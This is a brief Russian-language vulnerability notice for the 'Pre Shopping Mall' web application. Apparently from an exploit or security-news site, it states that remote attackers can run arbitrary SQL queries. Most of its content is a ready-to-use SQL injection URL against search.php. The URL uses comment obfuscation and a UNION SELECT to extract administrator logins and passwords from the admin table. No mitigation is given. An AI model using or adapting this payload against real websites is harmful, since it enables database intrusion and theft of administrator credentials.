Программа: Pre Shopping Mall

Уязвимость позволяет удаленному злоумышленнику выполнить произвольные SQL-запросы в базе данных приложения.

Эксплоит:

http://site.com/emall/search.php?search=’/**/and/**/1=2/**/UNION/**/ALL/* */SELECT/**/1,2,3,CONCAT(login,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16/* */FROM/**/admin/*

Оставить мнение